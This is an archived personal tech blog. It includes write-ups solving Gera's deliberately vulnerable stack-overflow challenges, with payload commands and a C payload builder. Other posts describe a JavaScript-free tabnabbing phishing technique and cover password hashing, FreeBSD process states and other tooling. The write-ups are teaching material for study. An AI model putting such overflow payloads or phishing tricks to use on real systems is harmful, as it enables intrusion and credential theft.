Saturday, December 25, 2010

Warming up to the stack #3

#include <stdio.h>
int main() {
  int cookie;
  char buf[80];
  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  gets(buf);
  if (cookie == 0x01020005)
    printf("you win!\n");
}

Not much is new here. We exploit this the same way we did the first two, except that the cookie now contains a null byte (0x00, typed as Ctrl+@).

I want to point out one thing that I didn't mention in my previous posts. The addresses of cookie and buf are printed out, so we don't really need to "guess" where they are on the stack. I ignored this before because, in real programs, the address values are rarely printed out.

Thursday, December 23, 2010

Warming up to the stack #2

#include <stdio.h>
int main() {
  int cookie;
  char buf[80];
  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  gets(buf);
  if (cookie == 0x01020305)
    printf("you win!\n");
}

Gera's challenge #2 is exactly the same as the first one except for the cookie we need to write. What makes this interesting is that the characters are not "printable" (they don't have a symbolic representation).

There are a few ways to deal with this:
  • Take a file similar to the original one and use a hex editor, like hexcurse(1), to manually modify it.
  • Use inline perl: perl -e 'print "q" x 80 . "\x05\x03\x02\x01"'
  • Directly enter the special characters using ctrl+v followed by ctrl+key, where the key is the character at 0x40 + the value (so 0x05 is ctrl+E). This won't necessarily work on your terminal, because 0x03 corresponds to Ctrl + C.
%./a.out <exploit
buf: bfbfe9e8 cookie: bfbfea38
you win!
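
The ctrl+key rule from the list above is easy to check in a few lines of C. This is only a minimal sketch: the helper name ctrl_key_for is my own invention, and it covers just the control range 0x00 to 0x1f.

```c
#include <assert.h>

/* Hypothetical helper: returns the key to press together with Ctrl
 * in order to type the control byte `value`, i.e. 0x40 + value. */
char ctrl_key_for(unsigned char value) {
    assert(value <= 0x1f);  /* only control characters have a Ctrl+key form */
    return (char)(0x40 + value);
}
```

For the cookie bytes 0x05, 0x03, 0x02 and 0x01 this gives E, C, B and A, and ctrl_key_for(0x00) gives '@', which is where Ctrl+@ for the null byte comes from.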

Tuesday, December 21, 2010

Gera's Insecure Programming: Warming up to the stack #1

Gera has a series of "challenges" designed to help teach people the basics of exploitation. The goal is to provide some input to the program to get it to output "you win!"

The code for the first one:
/* stack1.c                                     *
 * specially crafted to feed your brain by gera */
#include <stdio.h>
int main() {
   int cookie;
   char buf[80];
   printf("buf: %08x cookie: %08x\n", &buf, &cookie);
   gets(buf);
   if (cookie == 0x41424344)
      printf("you win!\n");
}

At a lower level
The assembly for the above program, generated by clang on FreeBSD with -O3 -fomit-frame-pointer (comments are my addition):
   pushl %esi
   subl $100, %esp
   leal -8(%ebp), %eax
   movl %eax, 8(%esp)
   leal -88(%ebp), %esi
   movl %esi, 4(%esp)
   movl $.L.str, (%esp)
   call printf
   movl %esi, (%esp)
   call gets      ; note that gets does not have a length argument
   cmpl $1094861636, -8(%ebp)
   jne .LBB0_2    ; we will come back to this
   movl $str, (%esp)
   call puts
   xorl %eax, %eax
   addl $100, %esp
   popl %esi

Break it down
The program starts off by creating two variables: a cookie and a fixed size buffer. It then prints out the addresses of buf and cookie.
Then the fun starts: gets(3) is called to put data in buf. gets is a very insecure function. To quote the man page:
The gets() function cannot be used securely. Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming line, the use of this function enables malicious users to arbitrarily change a running program's functionality through a buffer overflow attack.
Then we have a check to see if cookie is equal to some value. We can convert this value from an integer to printable ascii(7) characters: 0x41 is A, 0x42 is B, etc. So we want to set the cookie to "ABCD". There is one little gotcha: the machine I'm using (and most likely yours too) is little endian, so the least significant byte is stored first and we actually need to reverse the order of our text.
What should we actually do?
There is no guarantee of how C variables are laid out in memory, but we can make a good guess. On my system sizeof(int) is 4, and sizeof(char) is always 1, so our stack probably looks like this (highest address first):
cookie most significant byte
cookie byte 2
cookie byte 3
cookie least significant byte
buf[79]
...
buf[0]
Let's try it!

The string we want to insert is
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxDCBA: 80 filler characters to fill the buffer and then DCBA to fill the cookie (the important part). In the command below, jot -b x -s '' 80 prints the character x 80 times with no separator between them.

[eitan@ByteByte ~/gstack ]%echo $(jot -b x -s '' 80)DCBA > exploit 
[eitan@ByteByte ~/gstack ]%./a.out <exploit 
buf: bfbfea48 cookie: bfbfea98
you win!
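
The same payload can also be built in C, which helps once the cookie bytes are not printable. This is a minimal sketch and not part of Gera's challenge: build_payload and BUF_SIZE are names I made up, and it assumes that cookie sits directly after buf (as the printed addresses suggest) and that no cookie byte is a newline (0x0a), since gets would stop there.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE 80  /* size of buf in the challenge source */

/* Hypothetical helper: fills `out` (at least BUF_SIZE + 5 bytes) with
 * BUF_SIZE filler bytes, the cookie in little-endian byte order, and a
 * trailing newline so gets() stops reading. Returns the payload length. */
size_t build_payload(unsigned char *out, uint32_t cookie) {
    assert(out != NULL);
    memset(out, 'x', BUF_SIZE);
    for (int i = 0; i < 4; i++) {
        /* least significant byte goes first on a little-endian machine */
        out[BUF_SIZE + i] = (unsigned char)((cookie >> (8 * i)) & 0xff);
    }
    out[BUF_SIZE + 4] = '\n';
    return BUF_SIZE + 5;
}
```

Writing the result to a file with fwrite gives the same bytes as the echo command above when the cookie is 0x41424344. Passing 0x01020305 or 0x01020005 instead should give payloads for challenges #2 and #3.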
A different way:
Let's say we didn't have the source and that this was some music player we wanted to (legally) jailbreak. If you disassemble the file, you can change the jump address or just remove the jump altogether to avoid the check:
[eitan@ByteByte ~/gstack !130!]%./a.out
buf: bfbfea48 cookie: bfbfea98
you win!
Some notes

No serious programmer uses gets anymore, and real exploits are likely to be harder to create due to OpenBSD's W^X protection, gcc's stack protector, and good coding habits. This was just an intro to the art of exploitation. I plan on following with either the next warming up to the stack challenge or the "esoteric" format string vulnerabilities.

Update 12/26/10 clarified the goal of the exploit. Explained what "jot" does.

Thursday, December 2, 2010

Google translate proxy no longer available

One old trick to bypass simple domain based filters was to use Google translate on the domain and go from English to English (or the native language to the native language - whatever it might be).

I recently came across a link that happened to use Google translate in that way (I'm not sure why), and I got an error from Google:

"Translation from English into English is not supported."

When I tried with other languages I got similar errors. Translating to other languages works as usual.

Luckily this trick is not really needed as there are thousands of available proxies or one could just make their own.

Sunday, October 10, 2010

What language should you learn first?

Kaushal Shriyan on the mailing list asked:
"Is it better to learn Perl or Python since i can manage only writing simple bash shell scripts."[1]
Recently on ##C++-basic there was a discussion that related to learning low level vs high level languages first.

Both of these discussions are based on the premise that there is a right answer.

There are a number of things wrong with this question.
  1. Kaushal seems to be saying that he can only learn one language or the other. Why not learn both?
  2. Programming language choice depends on the project one plans on working on. Using perl to write a kernel is impossible and using COBOL to write a GUI application is silly. Asking such a question requires more context.
  3. For some reason Perl and Python are the only languages given as choices. What about C++? Why not Haskell? There are many useful languages and they each have their own pros and cons.
More generally, there are many skills a programmer needs to have, and there are different ways of learning each of these skills.
  • Code organization and Design Patterns
  • Programming constructs
  • Abstraction and encapsulation
  • Data structures and how to choose between them
  • Syscalls and context switching
  • and many more
All of these topics can be reasonably broken down into two types: programming topics and computer science topics.

Higher-level languages allow programmers to abstract away the low level details and focus on getting a task done. This is great for completing a task and making a beginner feel proud about what (s)he has created. It also helps the programmer learn programming basics such as variables, loops, arrays, input/output, and functions without getting bogged down with memory management.

On the other hand, choosing between various data structures is confusing unless one understands why things work the way they do. Learning about context switches, data structures, syscalls, pointers, etc is easier in a low level language (like C or C++).
So what language should someone learn first?

A good programmer should learn both types of languages. In my experience a lot of beginners have trouble wrapping their heads around functions and other organizational patterns such as classes. I usually start people with Python and move quickly to C++. This helps to teach good programming style and techniques before they go on to learn the low level concepts as well.


Tuesday, September 21, 2010

Process Kernel States (wchan in ps)

FreeBSD has a nice feature: pressing Ctrl-T sends SIGINFO to the foreground process and prints some interesting data about it, such as the load of the CPU, the command that is currently being run, and the kernel state the process is in (the wchan keyword in ps(1)).
This state is set by the msleep function and names the syscall or lock that the process is waiting on.

I know of no other list explaining each of these states so here it goes:

biord: block on io read.
futex: [Linux emulation] process is waiting until a futex is released (see fast userspace mutex)
getblk: get block (seems to be generated often by tar)
nanslp: process is sleeping for some number of nanoseconds (see nanosleep(2))
pause: process is waiting for a signal (see pause(3))
pcmwrv: waiting for audio samples to be played
piperd: read(2) from a pipe
pipewr: write(2) to a pipe
physrd: reading from a HDD
runnable: process is ready to run on the CPU
running: currently on CPU
sbwait: wait for socket to return data (see uipc_sockbuf.c) 
swread: read in from swap
stopev: process is stopped because of a debugging event (see sys_process.c; relates to ptrace(2))
ttyout: write(2) to a tty
ttyin: read(2) from a tty
ucond: a process is blocked waiting on a pthreads condition variable
vnread: part of the pager (see vnode_pager.c)
wait: wait(2) for a child process
wdrain: write drain. On a device mounted with the async option (or soft-updates) wait until all the previous writes have been completed. (see vfs_bio.c)
zombie: a process died but its parent did not wait(2) for it.

There are other syscalls that are similar to the ones mentioned above (such as readv(2) instead of read(2), and waitpid(2) instead of wait(2)) which will end up with the same wchans.

Thank you irc:// for helping me figure out what all of these mean.

I will try to keep this list up-to-date as I find out about more of them.

Update 9/21/10: removed "CPU0" state - it doesn't show up in the siginfo output - only in the top output.
Update 9/22/10: added getblk entry without link to syscall
Update 10/7/10: added wdrain, swread - I have a /lot/ more to add. 
I need to add all the following, and more: sfbufa, umtxqb, psleep, qsleep, bo_wwait, bwunpin, sigwait, pause, suspkp, ktsusp, mntref, "mount drain", roothold, rootwait, failpt, exithold, exit1, ritwait, kqflxwt, kqclose, kqclo1, kqclo2, kqkclr, ithread, iev_rmh, purgelocks, conifhk, aioprn, aiordy, aiospn, aiowc, vlruwt, vlruwk, targrd, tgabrt, cgticb, sgread, simfree, ccb_scanq, crydev, crypto_destroy, crypto_ret_wait

Thursday, July 1, 2010

Sunday, May 30, 2010

Tabnabbing Without Javascript

I recently came across a new type of phishing attack called tabnabbing. The attack works by using a client side script to detect when the user is not viewing the page, then changing the page content to a phishing page.

The method described by Aza Raskin can easily be prevented by disabling Javascript. However, it is possible to perform the attack even if Javascript is disabled. Most browsers have the ability to refresh the page using a <meta> refresh tag. The page waits until the user presumably isn't looking at the tab any more, then changes the location of the page to one that resembles the true site (as shown in this proof of concept).

If you got to this post via the POC please note that the POC is not a phishing site and I DO NOT log ANY usernames or passwords.

Sunday, March 28, 2010

How to safely handle user passwords

When you create a website or other service, you take on a responsibility to properly store users' credentials; someone who gets access to a user's account can easily see personal information, potentially even financial information. Even if you think you don't have anything of importance, 73% of users[1] have the same password for everything, including online banking accounts.

When dealing with passwords, you should generally assume that the attacker has a copy of your database. Many websites still have SQL injection vulnerabilities[2]. Most websites are vulnerable to XSS/CSRF attacks[3]. For this reason it is a bad idea to store passwords as clear text; instead one should use a hash[4].

Even with properly stored passwords, users still insist on choosing low security passwords[5]. As a result, malicious hackers have compiled lists of commonly used passwords. In order to mitigate these brute force attacks, a lot of techniques have been developed. For example, some sites require you to enter a CAPTCHA, but most of these could easily be defeated[6]. Another simple technique is to limit login failures (once an incorrect password has been entered, don't allow another attempt for X period of time). I prefer an exponential delay where each failed attempt causes the delay to become longer than the previous one. There are other possibilities that could take into account more sophisticated criteria such as the geographical region and time of day.
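
The exponential delay can be sketched in a few lines of C. This is only an illustration under my own assumptions: the function name, the one second starting delay, and the one hour cap are all made up for the example.

```c
#include <assert.h>

#define BASE_DELAY_SECONDS 1U     /* assumed delay after the first failure */
#define MAX_DELAY_SECONDS  3600U  /* assumed cap so the delay stays bounded */

/* Hypothetical helper: seconds to wait before the next login attempt,
 * doubling with every consecutive failed attempt. */
unsigned login_delay_seconds(unsigned failures) {
    if (failures == 0)
        return 0;
    unsigned delay = BASE_DELAY_SECONDS;
    for (unsigned i = 1; i < failures; i++) {
        if (delay >= MAX_DELAY_SECONDS / 2)
            return MAX_DELAY_SECONDS;  /* clamp instead of overflowing */
        delay *= 2;
    }
    assert(delay <= MAX_DELAY_SECONDS);
    return delay;
}
```

With these numbers the first few failures cost 1, 2, 4 and 8 seconds, so a legitimate user who mistypes once barely notices, while a script guessing thousands of passwords quickly hits the cap.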

Although important to know, the above solutions won't help if the attacker has a copy of the user database. In the past, hashing the password was sufficient to prevent an attacker from accessing user accounts. Nowadays computers are fast enough that even though the passwords are hashed, compromise is still possible. This is done by taking the list of commonly used passwords and hashing them to see if any match the database. In order to limit the potential for this attack, a new defense was created called "salting". What this entails is hashing a random value (called a "salt") combined with the password. When the user submits his password, the system hashes it combined with the salt and compares the result to the hash already stored in the database. The security benefit of this is that the attacker needs to calculate the hashes for common passwords separately for each user.

As technology improved, even this became insecure. Nowadays attackers can just hash every conceivable password. Furthermore, attackers can work together and use "rainbow tables", which contain pre-computed hashes of millions of passwords and salts. These tables are often generated using distributed computing, so each attacker does not have to develop one on their own. This reduces the amount of security that salts can offer.

Now that salting is not good enough, we need to explore other options. The main factor when exploring these options is time; this is because it is impossible to create an uncrackable password. What we do instead is increase the time required to discover the passwords so as to discourage the attacker. The issue is that many hash functions were not designed for password security, but rather for speedy verification. Hash functions like sha-256 (despite currently being unbroken) lend themselves to quickly hashing lists of passwords. Modern computers can md5-hash every conceivable alphanumeric 7 character password in less than an hour[7]. Despite widespread use, old hash functions like md5[8] or sha1[9] were recently discovered to be insecure.

Today there is bcrypt [pdf], a special hash function created specifically for password security. It is slow by design, and it can keep up with the constantly increasing speeds of computers because it uses a "work factor". Although you might be thinking that this will bog down your server, those that use it don't find this to be an issue. For these reasons I strongly advise the use of bcrypt along with the previously stated techniques such as salting.

2011-6-16: update: At the time I wrote this article I was unaware of scrypt, a slower (and therefore better) function to use[10]

[4] A hash is a function that takes some input and outputs a (sufficiently) unique output such that the original input can not be recovered. One simplistic (and highly insecure) hash function would be to count the number of times each letter occurs and store that instead. For example "One very bad zany apple" would become "31013000000102120100010021". It is not possible to know whether this hash came from "One very bad zany apple", "Noe vrey adb nzya pplea", or "Npdyoazaevebrnpyela". A cryptographic hash function is designed so that multiple passwords like this are hard to create.
[5] [pdf]
[6] Aska: A viable alternative to CAPTCHA? - Eitan Adler (2008)
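
The letter-counting hash from footnote [4] is simple enough to write out. This is a minimal sketch with names of my own choosing; it ignores case and anything that is not a letter, and assumes no letter occurs more than nine times.

```c
#include <assert.h>
#include <ctype.h>
#include <string.h>

/* Toy hash from footnote [4]: writes 26 digits, one count per letter a..z.
 * `out` must hold at least 27 bytes. Highly insecure by design. */
void letter_count_hash(const char *input, char out[27]) {
    assert(input != NULL && out != NULL);
    int counts[26] = {0};
    for (const char *p = input; *p != '\0'; p++) {
        int c = tolower((unsigned char)*p);
        if (c >= 'a' && c <= 'z')
            counts[c - 'a']++;
    }
    for (int i = 0; i < 26; i++) {
        assert(counts[i] <= 9);  /* one digit per letter */
        out[i] = (char)('0' + counts[i]);
    }
    out[26] = '\0';
}

/* Returns 1 when two inputs collide, i.e. produce the same toy hash. */
int same_letter_hash(const char *a, const char *b) {
    char ha[27], hb[27];
    letter_count_hash(a, ha);
    letter_count_hash(b, hb);
    return strcmp(ha, hb) == 0;
}
```

Any rearrangement of the same letters collides, which is exactly why this function is useless for passwords: same_letter_hash reports a match for all three example strings in the footnote.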

Edit 2010-3-31: fix footnote numbers; subtle grammar errors fixed.
Edit 2011-2-11: grammar errors fixed - thanks JT.

Edit 2011-6-16: change dates to use ISO format

tsocks with svn - failure

tsocks is a program that will "sockify" any application. It does so by watching the application and rewriting any networking requests to go through the socks server you specify in tsocks.conf.

You can either use tsocks by running tsocks command [arguments] or by running tsocks on followed by the commands you want to run. You turn it off by running tsocks off.

I ran into an annoying error when using tsocks to sockify subversion. I got the error:
svn: OPTIONS of '...': could not connect to server (...)
It turns out that using "tsocks svn up" failed this way, but when I tried the second possibility (tsocks on; svn up; tsocks off) it worked.
I have no clue why this might be.

Sunday, March 21, 2010

Mercurial Extensions

Mercurial has the ability to load extensions dynamically. All that is required is to modify ~/.hgrc.

In order to add an extension, open ~/.hgrc in your preferred text editor. Then look for a line that looks like [extensions]. If you don't find one, add it to the file. Under this line you can add a large number of extensions. Stock mercurial comes with a number of useful extensions (although none of them are turned on by default).

The following are the ones I found useful.
color  - displays output from some commands in color
fetch - does hg pull; hg update; hg merge in one command
graphlog - command to view revision graphs from a shell
progress (hgext.progress) - shows progress of some commands

To learn more about extensions, type hg help extensions into the command line.

Monday, March 1, 2010

Prediction: yahoo won't matter

Within the next 5 years Yahoo!, like AOL, will still be around but won't matter at all.

Thursday, February 4, 2010

The Daily Monthly

From the author of Cognitive Daily we have The Daily Monthly: each month a new topic, but each day a new post.

Sunday, January 24, 2010

Cognitive Daily comes to a close

Cognitive Daily, one of the best psychology blogs around, announced they will no longer be posting anything new.
I've been reading Cognitive Daily since I was in high school and I'm very saddened to see it go.

Tuesday, January 5, 2010

Useful google search tip

One way to avoid Google getting "too smart" about your search query is to purposely misspell words. Sometimes I've found more relevant results when I do that. The misspelling has to be close to the original word though.

Sunday, January 3, 2010

xslt: != vs not()

I made a minor change to my xslt file. I often write "stub questions" in my FAQ to remind myself to answer them. I added a simple attribute to the "item" element

<xs:attribute name="stub" default="false">
  <xs:simpleType>
    <xs:restriction base="xs:string">
      <xs:enumeration value="true"/>
      <xs:enumeration value="false"/>
    </xs:restriction>
  </xs:simpleType>
</xs:attribute>

This creates an optional attribute "stub" that is a string which could either be "true" or "false" and is by default "false".

That wasn't too hard to figure out. The harder part was getting my XSLT file to only display non-stub questions.

My first try was <xsl:if test="@stub != 'false'"> (I used != because of the default).
This, however, never showed any of my questions. It turns out that != doesn't work when the attribute doesn't exist: comparing an empty node-set with != is always false. After asking around on IRC, <xsl:if test="not(@stub = 'true')"> appears to be the correct way to do things.